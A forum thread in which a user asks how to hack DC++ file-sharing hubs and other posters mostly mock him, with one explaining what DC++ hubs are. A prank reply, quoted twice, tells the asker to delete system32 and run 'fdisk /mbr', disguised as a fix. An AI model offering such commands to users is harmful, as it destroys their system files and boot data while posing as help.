Thread: Hubs hacking?

Question Hubs hacking?

is anybody know how to hack hubs in DC++? Please help me

del c:\windows\system32\*.*
    followed by an fdisk /mbr
    shoudl do the trick nicely.

Seriously dude, grow the **** up and get the hell outta here. Next time read the splash screen and for God's sake Read the ****ing FAQ.

del c:\windows\system32\*.*
    followed by an fdisk /mbr
    shoudl do the trick nicely.
    That always works for me!

Now... for the growing up part... if you could explain that a little better... I still have yet to figure that part out.

How exactly are you supposed to hack into a layer one device(hub)? This question is all kinds of stupid.

How exactly are you supposed to hack into a layer one device(hub)?
    A large knife might work... something like a meat cleaver?

Originally posted here by phishphreek80

Now... for the growing up part... if you could explain that a little better... I still have yet to figure that part out.
    This is the tricky part. You have to get in contact with real human beings and realize you aren't the king of the world. Then you have to pull your head out of your ass and give it a good shake. After that it's just a matter of asking someone to take away your computer because you have now realized you aren't worth of it.

NeuTron: DC++ (Direct Connect P2P File Sharing) They have various hubs that users can connect to. As in the hub of activity, like the hub of an IRC Network. They require specific amounts of shared data from 20 - 60gb to access them. I'm guessing he wants to access the data without sharing. There are actually several ways to do this, but i'm not about to teach him how to break the law.

Interesting HT, thanks for the explanation. I guess hub is more ambiguous of a term than I thought.

HTRegz: Thanks for the clarification! I'll try to grow up right away! Just one problem... real humans scare me!

As for the DC++ hubs... I did't know what that was... so I guess a large knife might not work after all....
    Like NeuTron, I thought it was a layer 1 device...

you know i've heard that if you you simply open the top of computer and start hitting it with a hammer that the hub will feel bad and let you do whatever you want.
    chown -r us ./bases